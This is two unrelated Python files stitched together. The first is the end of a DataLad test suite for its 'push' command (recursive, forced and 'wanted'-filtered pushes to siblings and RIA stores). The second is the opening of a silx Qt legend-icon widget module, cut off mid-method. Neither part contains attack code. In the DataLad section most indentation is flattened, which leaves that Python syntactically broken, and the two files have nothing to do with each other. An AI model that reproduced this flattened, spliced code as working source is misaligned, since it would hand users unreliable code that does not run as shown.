assert_in_results(
res,
action='publish', status='error', target='target',
refspec=DEFAULT_REFSPEC,
operations=['rejected', 'error'])
# push with force=True works:
res = src.push(to='target', since='HEAD~2', force='gitpush')
assert_in_results(
res,
action='publish', status='ok', target='target',
refspec=DEFAULT_REFSPEC,
operations=['forced-update'])
eq_(list(target.get_branch_commits_(DEFAULT_BRANCH)),
list(src_repo.get_branch_commits_(DEFAULT_BRANCH)))
# we do not have more branches than we had in the beginning
# in particular no 'synced/<default branch>'
eq_(orig_branches, src_repo.get_branches())
def test_push():
yield check_push, False
yield check_push, True
def check_datasets_order(res, order='bottom-up'):
    """Check that no type=dataset record violates the expected order
    This is a somewhat weak test, i.e. records could be produced such that we
    do not detect that the order is violated, e.g. a/b c/d would satisfy
    either order although they might be ordered neither depth- nor breadth-wise.
    But this test allows catching obvious violations like a, a/b, a
    """
prev = None
for r in res:
if r.get('type') != 'dataset':
continue
if prev and r['path'] != prev:
if order == 'bottom-up':
assert_false(path_startswith(r['path'], prev))
elif order == 'top-down':
assert_false(path_startswith(prev, r['path']))
else:
raise ValueError(order)
prev = r['path']
@slow # 33sec on Yarik's laptop
@with_tempfile
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True, suffix='sub')
@with_tempfile(mkdir=True, suffix='subnoannex')
@with_tempfile(mkdir=True, suffix='subsub')
def test_push_recursive(
origin_path, src_path, dst_top, dst_sub, dst_subnoannex, dst_subsub):
# dataset with two submodules and one subsubmodule
origin = Dataset(origin_path).create()
origin_subm1 = origin.create('sub m')
origin_subm1.create('subsub m')
origin.create('subm noannex', annex=False)
origin.save()
assert_repo_status(origin.path)
    # prepare src as a fresh clone with all subdatasets checked out recursively
# running on a clone should make the test scenario more different than
# test_push(), even for the pieces that should be identical
top = Clone.__call__(source=origin.path, path=src_path)
subs = top.get('.', recursive=True, get_data=False, result_xfm='datasets')
# order for '.' should not be relied upon, so sort by path
sub, subsub, subnoannex = sorted(subs, key=lambda ds: ds.path)
target_top = mk_push_target(top, 'target', dst_top, annex=True)
# subdatasets have no remote yet, so recursive publishing should fail:
res = top.push(to="target", recursive=True, on_failure='ignore')
check_datasets_order(res)
assert_in_results(
res, path=top.path, type='dataset',
refspec=DEFAULT_REFSPEC,
operations=['new-branch'], action='publish', status='ok',
target='target')
for d in (sub, subsub, subnoannex):
assert_in_results(
res, status='error', type='dataset', path=d.path,
message=("Unknown target sibling '%s'.",
'target'))
# now fix that and set up targets for the submodules
target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)
target_subnoannex = mk_push_target(
subnoannex, 'target', dst_subnoannex, annex=False)
target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)
# and same push call as above
res = top.push(to="target", recursive=True)
check_datasets_order(res)
# topds skipped
assert_in_results(
res, path=top.path, type='dataset',
action='publish', status='notneeded', target='target')
# the rest pushed
for d in (sub, subsub, subnoannex):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# all corresponding branches match across all datasets
for s, d in zip((top, sub, subnoannex, subsub),
(target_top, target_sub, target_subnoannex,
target_subsub)):
eq_(list(s.repo.get_branch_commits_(DEFAULT_BRANCH)),
list(d.get_branch_commits_(DEFAULT_BRANCH)))
if s != subnoannex:
eq_(list(s.repo.get_branch_commits_("git-annex")),
list(d.get_branch_commits_("git-annex")))
# rerun should not result in further pushes of the default branch
res = top.push(to="target", recursive=True)
check_datasets_order(res)
assert_not_in_results(
res, status='ok', refspec=DEFAULT_REFSPEC)
assert_in_results(
res, status='notneeded', refspec=DEFAULT_REFSPEC)
# now annex a file in subsub
test_copy_file = subsub.pathobj / 'test_mod_annex_file'
test_copy_file.write_text("Heavy stuff.")
# save all the way up
assert_status(
('ok', 'notneeded'),
top.save(message='subsub got something', recursive=True))
assert_repo_status(top.path)
# publish straight up, should be smart by default
res = top.push(to="target", recursive=True)
check_datasets_order(res)
# we see 3 out of 4 datasets pushed (sub noannex was left unchanged)
for d in (top, sub, subsub):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# file content copied too
assert_in_results(
res,
action='copy',
status='ok',
path=str(test_copy_file))
# verify it is accessible, drop and bring back
assert_status('ok', top.drop(str(test_copy_file)))
ok_(not subsub.repo.file_has_content('test_mod_annex_file'))
top.get(test_copy_file)
ok_file_has_content(test_copy_file, 'Heavy stuff.')
    # make two modifications
(sub.pathobj / 'test_mod_annex_file').write_text('annex')
(subnoannex.pathobj / 'test_mod_file').write_text('git')
# save separately
top.save(sub.pathobj, message='annexadd', recursive=True)
top.save(subnoannex.pathobj, message='gitadd', recursive=True)
# now only publish the latter one
res = top.push(to="target", since=DEFAULT_BRANCH + '~1', recursive=True)
# nothing copied, no reports on the other modification
assert_not_in_results(res, action='copy')
assert_not_in_results(res, path=sub.path)
for d in (top, subnoannex):
assert_in_results(
res, status='ok', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# an unconditional push should now pick up the remaining changes
res = top.push(to="target", recursive=True)
assert_in_results(
res,
action='copy',
status='ok',
path=str(sub.pathobj / 'test_mod_annex_file'))
assert_in_results(
res, status='ok', type='dataset', path=sub.path,
refspec=DEFAULT_REFSPEC)
for d in (top, subnoannex, subsub):
assert_in_results(
res, status='notneeded', type='dataset', path=d.path,
refspec=DEFAULT_REFSPEC)
# if noannex target gets some annex, we still should not fail to push
target_subnoannex.call_git(['annex', 'init'])
# just to ensure that we do need something to push
(subnoannex.pathobj / "newfile").write_text("content")
subnoannex.save()
res = subnoannex.push(to="target")
assert_in_results(res, status='ok', type='dataset')
@slow # 12sec on Yarik's laptop
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_push_subds_no_recursion(src_path, dst_top, dst_sub, dst_subsub):
# dataset with one submodule and one subsubmodule
top = Dataset(src_path).create()
sub = top.create('sub m')
test_file = sub.pathobj / 'subdir' / 'test_file'
test_file.parent.mkdir()
test_file.write_text('some')
subsub = sub.create(sub.pathobj / 'subdir' / 'subsub m')
top.save(recursive=True)
assert_repo_status(top.path)
target_top = mk_push_target(top, 'target', dst_top, annex=True)
target_sub = mk_push_target(sub, 'target', dst_sub, annex=True)
target_subsub = mk_push_target(subsub, 'target', dst_subsub, annex=True)
# now publish, but NO recursion, instead give the parent dir of
# both a subdataset and a file in the middle subdataset
res = top.push(
to='target',
# give relative to top dataset to elevate the difficulty a little
path=str(test_file.relative_to(top.pathobj).parent))
assert_status('ok', res)
assert_in_results(res, action='publish', type='dataset', path=top.path)
assert_in_results(res, action='publish', type='dataset', path=sub.path)
assert_in_results(res, action='copy', type='file', path=str(test_file))
# the lowest-level subdataset isn't touched
assert_not_in_results(
res, action='publish', type='dataset', path=subsub.path)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_force_checkdatapresent(srcpath, dstpath):
src = Dataset(srcpath).create()
target = mk_push_target(src, 'target', dstpath, annex=True, bare=True)
(src.pathobj / 'test_mod_annex_file').write_text("Heavy stuff.")
src.save(to_git=False, message="New annex file")
assert_repo_status(src.path, annex=True)
whereis_prior = src.repo.whereis(files=['test_mod_annex_file'])[0]
res = src.push(to='target', data='nothing')
# nothing reported to be copied
assert_not_in_results(res, action='copy')
# we got the git-push nevertheless
eq_(src.repo.get_hexsha(DEFAULT_BRANCH), target.get_hexsha(DEFAULT_BRANCH))
# nothing moved
eq_(whereis_prior, src.repo.whereis(files=['test_mod_annex_file'])[0])
# now a push without forced no-transfer
# we do not give since, so the non-transfered file is picked up
# and transferred
res = src.push(to='target', force=None)
# no branch change, done before
assert_in_results(res, action='publish', status='notneeded',
refspec=DEFAULT_REFSPEC)
# but availability update
assert_in_results(res, action='publish', status='ok',
refspec='refs/heads/git-annex:refs/heads/git-annex')
assert_in_results(res, status='ok',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy')
# whereis info reflects the change
ok_(len(whereis_prior) < len(
src.repo.whereis(files=['test_mod_annex_file'])[0]))
# do it yet again will do nothing, because all is up-to-date
assert_status('notneeded', src.push(to='target', force=None))
# an explicit reference point doesn't change that
assert_status('notneeded',
src.push(to='target', force=None, since='HEAD~1'))
# now force data transfer
res = src.push(to='target', force='checkdatapresent')
# no branch change, done before
assert_in_results(res, action='publish', status='notneeded',
refspec=DEFAULT_REFSPEC)
# no availability update
assert_in_results(res, action='publish', status='notneeded',
refspec='refs/heads/git-annex:refs/heads/git-annex')
# but data transfer
assert_in_results(res, status='ok',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy')
# force data transfer, but data isn't available
src.repo.drop('test_mod_annex_file')
res = src.push(to='target', path='.', force='checkdatapresent', on_failure='ignore')
assert_in_results(res, status='impossible',
path=str(src.pathobj / 'test_mod_annex_file'),
action='copy',
message='Slated for transport, but no content present')
@skip_if_on_windows # https://github.com/datalad/datalad/issues/4278
@with_tempfile(mkdir=True)
@with_tree(tree={'ria-layout-version': '1\n'})
def test_ria_push(srcpath, dstpath):
# complex test involving a git remote, a special remote, and a
# publication dependency
src = Dataset(srcpath).create()
testfile = src.pathobj / 'test_mod_annex_file'
testfile.write_text("Heavy stuff.")
src.save()
assert_status(
'ok',
src.create_sibling_ria(
"ria+{}".format(get_local_file_url(dstpath, compatibility='git')),
"datastore"))
res = src.push(to='datastore')
assert_in_results(
res, action='publish', target='datastore', status='ok',
refspec=DEFAULT_REFSPEC)
assert_in_results(
res, action='publish', target='datastore', status='ok',
refspec='refs/heads/git-annex:refs/heads/git-annex')
assert_in_results(
res, action='copy', target='datastore-storage', status='ok',
path=str(testfile))
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_gh1426(origin_path, target_path):
# set up a pair of repos, one the published copy of the other
origin = Dataset(origin_path).create()
target = mk_push_target(
origin, 'target', target_path, annex=True, bare=False)
origin.push(to='target')
assert_repo_status(origin.path)
assert_repo_status(target.path)
eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
# gist of #1426 is that a newly added subdataset does not cause the
# superdataset to get published
origin.create('sub')
assert_repo_status(origin.path)
neq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
# now push
res = origin.push(to='target')
assert_result_count(
res, 1, status='ok', type='dataset', path=origin.path,
action='publish', target='target', operations=['fast-forward'])
eq_(origin.repo.get_hexsha(DEFAULT_BRANCH),
target.get_hexsha(DEFAULT_BRANCH))
@skip_if_adjusted_branch # gh-4075
@skip_if_on_windows # create_sibling incompatible with win servers
@skip_ssh
@with_tree(tree={'1': '123'})
@with_tempfile(mkdir=True)
@serve_path_via_http
def test_publish_target_url(src, desttop, desturl):
# https://github.com/datalad/datalad/issues/1762
ds = Dataset(src).create(force=True)
ds.save('1')
ds.create_sibling('ssh://datalad-test:%s/subdir' % desttop,
name='target',
target_url=desturl + 'subdir/.git')
results = ds.push(to='target')
assert results
ok_file_has_content(Path(desttop, 'subdir', '1'), '123')
@with_tempfile(mkdir=True)
@with_tempfile()
@with_tempfile()
def test_gh1763(src, target1, target2):
# this test is very similar to test_publish_depends, but more
# comprehensible, and directly tests issue 1763
src = Dataset(src).create(force=True)
target1 = mk_push_target(src, 'target1', target1, bare=False)
target2 = mk_push_target(src, 'target2', target2, bare=False)
src.siblings('configure', name='target2', publish_depends='target1',
result_renderer=None)
# a file to annex
(src.pathobj / 'probe1').write_text('probe1')
src.save('probe1', to_git=False)
# make sure the probe is annexed, not straight in Git
assert_in('probe1', src.repo.get_annexed_files(with_content_only=True))
# publish to target2, must handle dependency
src.push(to='target2')
for target in (target1, target2):
# with a managed branch we are pushing into the corresponding branch
# and do not see a change in the worktree
if not target.is_managed_branch():
# direct test for what is in the checkout
assert_in(
'probe1',
target.get_annexed_files(with_content_only=True))
# ensure git-annex knows this target has the file
assert_in(target.config.get('annex.uuid'), src.repo.whereis(['probe1'])[0])
@with_tempfile()
@with_tempfile()
def test_gh1811(srcpath, clonepath):
orig = Dataset(srcpath).create()
(orig.pathobj / 'some').write_text('some')
orig.save()
clone = Clone.__call__(source=orig.path, path=clonepath)
(clone.pathobj / 'somemore').write_text('somemore')
clone.save()
clone.repo.call_git(['checkout', 'HEAD~1'])
res = clone.push(to=DEFAULT_REMOTE, on_failure='ignore')
assert_result_count(res, 1)
assert_result_count(
res, 1,
path=clone.path, type='dataset', action='publish',
status='impossible',
message='There is no active branch, cannot determine remote '
'branch',
)
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@with_tempfile()
@with_tempfile()
def test_push_wanted(srcpath, dstpath):
src = Dataset(srcpath).create()
(src.pathobj / 'data.0').write_text('0')
(src.pathobj / 'secure.1').write_text('1')
(src.pathobj / 'secure.2').write_text('2')
src.save()
# Dropping a file to mimic a case of simply not having it locally (thus not
# to be "pushed")
src.drop('secure.2', check=False)
# Annotate sensitive content, actual value "verysecure" does not matter in
# this example
src.repo.set_metadata(
add={'distribution-restrictions': 'verysecure'},
files=['secure.1', 'secure.2'])
src.create_sibling(
dstpath,
annex_wanted="not metadata=distribution-restrictions=*",
name='target',
)
# check that wanted is obeyed, since set in sibling configuration
res = src.push(to='target')
assert_in_results(
res, action='copy', path=str(src.pathobj / 'data.0'), status='ok')
for p in ('secure.1', 'secure.2'):
assert_not_in_results(res, path=str(src.pathobj / p))
assert_status('notneeded', src.push(to='target'))
# check the target to really make sure
dst = Dataset(dstpath)
# normal file, yes
eq_((dst.pathobj / 'data.0').read_text(), '0')
# secure file, no
if dst.repo.is_managed_branch():
neq_((dst.pathobj / 'secure.1').read_text(), '1')
else:
assert_raises(FileNotFoundError, (dst.pathobj / 'secure.1').read_text)
# reset wanted config, which must enable push of secure file
src.repo.set_preferred_content('wanted', '', remote='target')
res = src.push(to='target')
assert_in_results(res, path=str(src.pathobj / 'secure.1'))
eq_((dst.pathobj / 'secure.1').read_text(), '1')
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@slow # 10sec on Yarik's laptop
@with_tempfile(mkdir=True)
def test_auto_data_transfer(path):
path = Path(path)
ds_a = Dataset(path / "a").create()
(ds_a.pathobj / "foo.dat").write_text("foo")
ds_a.save()
# Should be the default, but just in case.
ds_a.repo.config.set("annex.numcopies", "1", where="local")
ds_a.create_sibling(str(path / "b"), name="b")
# With numcopies=1, no data is copied with data="auto".
res = ds_a.push(to="b", data="auto", since=None)
assert_not_in_results(res, action="copy")
# Even when a file is explicitly given.
res = ds_a.push(to="b", path="foo.dat", data="auto", since=None)
assert_not_in_results(res, action="copy")
# numcopies=2 changes that.
ds_a.repo.config.set("annex.numcopies", "2", where="local")
res = ds_a.push(to="b", data="auto", since=None)
assert_in_results(
res, action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "foo.dat"))
# --since= limits the files considered by --auto.
(ds_a.pathobj / "bar.dat").write_text("bar")
ds_a.save()
(ds_a.pathobj / "baz.dat").write_text("baz")
ds_a.save()
res = ds_a.push(to="b", data="auto", since="HEAD~1")
assert_not_in_results(
res,
action="copy", path=str(ds_a.pathobj / "bar.dat"))
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "baz.dat"))
# --auto also considers preferred content.
ds_a.repo.config.unset("annex.numcopies", where="local")
ds_a.repo.set_preferred_content("wanted", "nothing", remote="b")
res = ds_a.push(to="b", data="auto", since=None)
assert_not_in_results(
res,
action="copy", path=str(ds_a.pathobj / "bar.dat"))
ds_a.repo.set_preferred_content("wanted", "anything", remote="b")
res = ds_a.push(to="b", data="auto", since=None)
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "bar.dat"))
# FIXME: on crippled FS post-update hook enabling via create-sibling doesn't
# work ATM
@skip_if_adjusted_branch
@slow # 16sec on Yarik's laptop
@with_tempfile(mkdir=True)
def test_auto_if_wanted_data_transfer_path_restriction(path):
path = Path(path)
ds_a = Dataset(path / "a").create()
ds_a_sub0 = ds_a.create("sub0")
ds_a_sub1 = ds_a.create("sub1")
for ds in [ds_a, ds_a_sub0, ds_a_sub1]:
(ds.pathobj / "sec.dat").write_text("sec")
(ds.pathobj / "reg.dat").write_text("reg")
ds_a.save(recursive=True)
ds_a.create_sibling(str(path / "b"), name="b",
annex_wanted="not metadata=distribution-restrictions=*",
recursive=True)
for ds in [ds_a, ds_a_sub0, ds_a_sub1]:
ds.repo.set_metadata(add={"distribution-restrictions": "doesntmatter"},
files=["sec.dat"])
# wanted-triggered --auto can be restricted to subdataset...
res = ds_a.push(to="b", path="sub0", data="auto-if-wanted",
recursive=True)
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "reg.dat"))
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub0.pathobj / "reg.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub0.pathobj / "sec.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub1.pathobj / "reg.dat"))
# ... and to a wanted file.
res = ds_a.push(to="b", path="reg.dat", data="auto-if-wanted",
recursive=True)
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "reg.dat"))
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a_sub1.pathobj / "reg.dat"))
# But asking to transfer a file does not do it if the remote has a
# wanted setting and doesn't want it.
res = ds_a.push(to="b", path="sec.dat", data="auto-if-wanted",
recursive=True)
assert_not_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "sec.dat"))
res = ds_a.push(to="b", path="sec.dat", data="anything", recursive=True)
assert_in_results(
res,
action="copy", target="b", status="ok",
path=str(ds_a.pathobj / "sec.dat"))
@with_tempfile(mkdir=True)
def test_push_git_annex_branch_when_no_data(path):
path = Path(path)
ds = Dataset(path / "a").create()
target = mk_push_target(ds, "target", str(path / "target"),
annex=False, bare=True)
(ds.pathobj / "f0").write_text("0")
ds.save()
ds.push(to="target", data="nothing")
assert_in("git-annex",
{d["refname:strip=2"]
for d in target.for_each_ref_(fields="refname:strip=2")})
@known_failure_githubci_osx
@with_tree(tree={"ds": {"f0": "0", "f1": "0", "f2": "0",
"f3": "1",
"f4": "2", "f5": "2"}})
def test_push_git_annex_branch_many_paths_same_data(path):
path = Path(path)
ds = Dataset(path / "ds").create(force=True)
ds.save()
mk_push_target(ds, "target", str(path / "target"),
annex=True, bare=False)
nbytes = sum(ds.repo.get_content_annexinfo(paths=[f])[f]["bytesize"]
for f in [ds.repo.pathobj / "f0",
ds.repo.pathobj / "f3",
ds.repo.pathobj / "f4"])
with swallow_logs(new_level=logging.DEBUG) as cml:
res = ds.push(to="target")
assert_in("{} bytes of annex data".format(nbytes), cml.out)
# 3 files point to content already covered by another file.
assert_result_count(res, 3,
action="copy", type="file", status="notneeded")
@known_failure_githubci_osx
@with_tree(tree={"ds": {"f0": "0"}})
def test_push_matching(path):
path = Path(path)
ds = Dataset(path / "ds").create(force=True)
ds.config.set('push.default', 'matching', where='local')
ds.save()
remote_ds = mk_push_target(ds, 'local', str(path / 'dssibling'),
annex=True, bare=False)
    # the fact that the next one even runs makes sure that we are in a better
# place than https://github.com/datalad/datalad/issues/4888
ds.push(to='local')
# and we pushed the commit in the current branch
eq_(remote_ds.get_hexsha(DEFAULT_BRANCH),
ds.repo.get_hexsha(DEFAULT_BRANCH))
@known_failure_githubci_win # https://github.com/datalad/datalad/issues/5271
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
@with_tempfile(mkdir=True)
def test_nested_pushclone_cycle_allplatforms(origpath, storepath, clonepath):
if 'DATALAD_SEED' in os.environ:
# we are using create-sibling-ria via the cmdline in here
# this will create random UUIDs for datasets
# however, given a fixed seed each call to this command will start
# with the same RNG seed, hence yield the same UUID on the same
# machine -- leading to a collision
raise SkipTest(
'Test incompatible with fixed random number generator seed')
    # the aim here is to high-level test a std create-push-clone cycle for a
# dataset with a subdataset, with the goal to ensure that correct branches
# and commits are tracked, regardless of platform behavior and condition
# of individual clones. Nothing fancy, just that the defaults behave in
# sensible ways
from datalad.cmd import WitlessRunner as Runner
run = Runner().run
# create original nested dataset
with chpwd(origpath):
run(['datalad', 'create', 'super'])
run(['datalad', 'create', '-d', 'super', str(Path('super', 'sub'))])
# verify essential linkage properties
orig_super = Dataset(Path(origpath, 'super'))
orig_sub = Dataset(orig_super.pathobj / 'sub')
(orig_super.pathobj / 'file1.txt').write_text('some1')
(orig_sub.pathobj / 'file2.txt').write_text('some1')
with chpwd(orig_super.path):
run(['datalad', 'save', '--recursive'])
# TODO not yet reported clean with adjusted branches
#assert_repo_status(orig_super.path)
# the "true" branch that sub is on, and the gitsha of the HEAD commit of it
orig_sub_corr_branch = \
orig_sub.repo.get_corresponding_branch() or orig_sub.repo.get_active_branch()
orig_sub_corr_commit = orig_sub.repo.get_hexsha(orig_sub_corr_branch)
    # make sure the super tracks this commit
assert_in_results(
orig_super.subdatasets(),
path=orig_sub.path,
gitshasum=orig_sub_corr_commit,
# TODO it should also track the branch name
# Attempted: https://github.com/datalad/datalad/pull/3817
# But reverted: https://github.com/datalad/datalad/pull/4375
)
# publish to a store, to get into a platform-agnostic state
# (i.e. no impact of an annex-init of any kind)
store_url = 'ria+' + get_local_file_url(storepath)
with chpwd(orig_super.path):
run(['datalad', 'create-sibling-ria', '--recursive',
'-s', 'store', store_url])
run(['datalad', 'push', '--recursive', '--to', 'store'])
# we are using the 'store' sibling's URL, which should be a plain path
store_super = AnnexRepo(orig_super.siblings(name='store')[0]['url'], init=False)
store_sub = AnnexRepo(orig_sub.siblings(name='store')[0]['url'], init=False)
# both datasets in the store only carry the real branches, and nothing
# adjusted
for r in (store_super, store_sub):
eq_(set(r.get_branches()), set([orig_sub_corr_branch, 'git-annex']))
# and reobtain from a store
cloneurl = 'ria+' + get_local_file_url(str(storepath), compatibility='git')
with chpwd(clonepath):
run(['datalad', 'clone', cloneurl + '#' + orig_super.id, 'super'])
run(['datalad', '-C', 'super', 'get', '--recursive', '.'])
# verify that nothing has changed as a result of a push/clone cycle
clone_super = Dataset(Path(clonepath, 'super'))
clone_sub = Dataset(clone_super.pathobj / 'sub')
assert_in_results(
clone_super.subdatasets(),
path=clone_sub.path,
gitshasum=orig_sub_corr_commit,
)
for ds1, ds2, f in ((orig_super, clone_super, 'file1.txt'),
(orig_sub, clone_sub, 'file2.txt')):
eq_((ds1.pathobj / f).read_text(), (ds2.pathobj / f).read_text())
    # get status info that does not recurse into subdatasets, i.e. not
# looking for uncommitted changes
# we should see no modification reported
assert_not_in_results(
clone_super.status(eval_subdataset_state='commit'),
state='modified')
# and now the same for a more expensive full status
assert_not_in_results(
clone_super.status(recursive=True),
state='modified')
@with_tempfile
def test_push_custom_summary(path):
path = Path(path)
ds = Dataset(path / "ds").create()
sib = mk_push_target(ds, "sib", str(path / "sib"), bare=False, annex=False)
(sib.pathobj / "f1").write_text("f1")
sib.save()
(ds.pathobj / "f2").write_text("f2")
ds.save()
# These options are true by default and our tests usually run with a
# temporary home, but set them to be sure.
ds.config.set("advice.pushUpdateRejected", "true", where="local")
ds.config.set("advice.pushFetchFirst", "true", where="local")
with swallow_outputs() as cmo:
ds.push(to="sib", result_renderer="default", on_failure="ignore")
assert_in("Hints:", cmo.out)
assert_in("action summary:", cmo.out)
|
the-stack_0_6554 | # coding: utf-8
# /*##########################################################################
#
# Copyright (c) 2004-2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Widget displaying a symbol (marker symbol, line style and color) to identify
an item displayed by a plot.
"""
__authors__ = ["V.A. Sole", "T. Rueter", "T. Vincent"]
__license__ = "MIT"
__date__ = "11/11/2019"
import logging
import numpy
from .. import qt, colors
_logger = logging.getLogger(__name__)
# Build all symbols
# Courtesy of the pyqtgraph project
_Symbols = None
"""Cache supported symbols as Qt paths"""
_NoSymbols = (None, 'None', 'none', '', ' ')
"""List of values resulting in no symbol being displayed for a curve"""
_LineStyles = {
None: qt.Qt.NoPen,
'None': qt.Qt.NoPen,
'none': qt.Qt.NoPen,
'': qt.Qt.NoPen,
' ': qt.Qt.NoPen,
'-': qt.Qt.SolidLine,
'--': qt.Qt.DashLine,
':': qt.Qt.DotLine,
'-.': qt.Qt.DashDotLine
}
"""Conversion from matplotlib-like linestyle to Qt"""
_NoLineStyle = (None, 'None', 'none', '', ' ')
"""List of style values resulting in no line being displayed for a curve"""
_colormapImage = {}
"""Store cached pixmap"""
# FIXME: Could be better to use a LRU dictionary
_COLORMAP_PIXMAP_SIZE = 32
"""Size of the cached pixmaps for the colormaps"""
def _initSymbols():
"""Init the cached symbol structure if not yet done."""
global _Symbols
if _Symbols is not None:
return
symbols = dict([(name, qt.QPainterPath())
for name in ['o', 's', 't', 'd', '+', 'x', '.', ',']])
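    # All symbol paths are defined within the unit square (0, 0)-(1, 1);
    # LegendIconWidget.paint() scales them to the icon size.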
symbols['o'].addEllipse(qt.QRectF(.1, .1, .8, .8))
symbols['.'].addEllipse(qt.QRectF(.3, .3, .4, .4))
symbols[','].addEllipse(qt.QRectF(.4, .4, .2, .2))
symbols['s'].addRect(qt.QRectF(.1, .1, .8, .8))
coords = {
't': [(0.5, 0.), (.1, .8), (.9, .8)],
'd': [(0.1, 0.5), (0.5, 0.), (0.9, 0.5), (0.5, 1.)],
'+': [(0.0, 0.40), (0.40, 0.40), (0.40, 0.), (0.60, 0.),
(0.60, 0.40), (1., 0.40), (1., 0.60), (0.60, 0.60),
(0.60, 1.), (0.40, 1.), (0.40, 0.60), (0., 0.60)],
'x': [(0.0, 0.40), (0.40, 0.40), (0.40, 0.), (0.60, 0.),
(0.60, 0.40), (1., 0.40), (1., 0.60), (0.60, 0.60),
(0.60, 1.), (0.40, 1.), (0.40, 0.60), (0., 0.60)]
}
for s, c in coords.items():
symbols[s].moveTo(*c[0])
for x, y in c[1:]:
symbols[s].lineTo(x, y)
symbols[s].closeSubpath()
tr = qt.QTransform()
tr.rotate(45)
symbols['x'].translate(qt.QPointF(-0.5, -0.5))
symbols['x'] = tr.map(symbols['x'])
symbols['x'].translate(qt.QPointF(0.5, 0.5))
_Symbols = symbols
class LegendIconWidget(qt.QWidget):
"""Object displaying linestyle and symbol of plots.
:param QWidget parent: See :class:`QWidget`
"""
def __init__(self, parent=None):
super(LegendIconWidget, self).__init__(parent)
_initSymbols()
# Visibilities
self.showLine = True
self.showSymbol = True
self.showColormap = True
# Line attributes
self.lineStyle = qt.Qt.NoPen
self.lineWidth = 1.
self.lineColor = qt.Qt.green
self.symbol = ''
# Symbol attributes
self.symbolStyle = qt.Qt.SolidPattern
self.symbolColor = qt.Qt.green
self.symbolOutlineBrush = qt.QBrush(qt.Qt.white)
self.symbolColormap = None
"""Name or array of colors"""
self.colormap = None
"""Name or array of colors"""
# Control widget size: sizeHint "is the only acceptable
# alternative, so the widget can never grow or shrink"
# (c.f. Qt Doc, enum QSizePolicy::Policy)
self.setSizePolicy(qt.QSizePolicy.Fixed,
qt.QSizePolicy.Fixed)
def sizeHint(self):
return qt.QSize(50, 15)
def setSymbol(self, symbol):
"""Set the symbol"""
symbol = str(symbol)
if symbol not in _NoSymbols:
if symbol not in _Symbols:
raise ValueError("Unknown symbol: <%s>" % symbol)
self.symbol = symbol
self.update()
def setSymbolColor(self, color):
"""
:param color: determines the symbol color
        :type color: qt.QColor
"""
self.symbolColor = qt.QColor(color)
self.update()
# Modify Line
def setLineColor(self, color):
self.lineColor = qt.QColor(color)
self.update()
def setLineWidth(self, width):
self.lineWidth = float(width)
self.update()
def setLineStyle(self, style):
"""Set the linestyle.
Possible line styles:
- '', ' ', 'None': No line
- '-': solid
- '--': dashed
- ':': dotted
- '-.': dash and dot
:param str style: The linestyle to use
"""
if style not in _LineStyles:
            raise ValueError('Unknown style: %s' % style)
self.lineStyle = _LineStyles[style]
self.update()
def _toLut(self, colormap):
"""Returns an internal LUT object used by this widget to manage
a colormap LUT.
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
:rtype: Union[None,str,numpy.ndarray]
"""
if isinstance(colormap, colors.Colormap):
# Helper to allow to support Colormap objects
c = colormap.getName()
if c is None:
c = colormap.getNColors()
colormap = c
return colormap
def setColormap(self, colormap):
"""Set the colormap to display
If the argument is a `Colormap` object, only the current state will be
displayed. The object itself will not be stored, and further changes
of this `Colormap` will not update this widget.
:param Union[str,numpy.ndarray,Colormap] colormap: The colormap to
display
"""
colormap = self._toLut(colormap)
if colormap is None:
if self.colormap is None:
return
self.colormap = None
self.update()
return
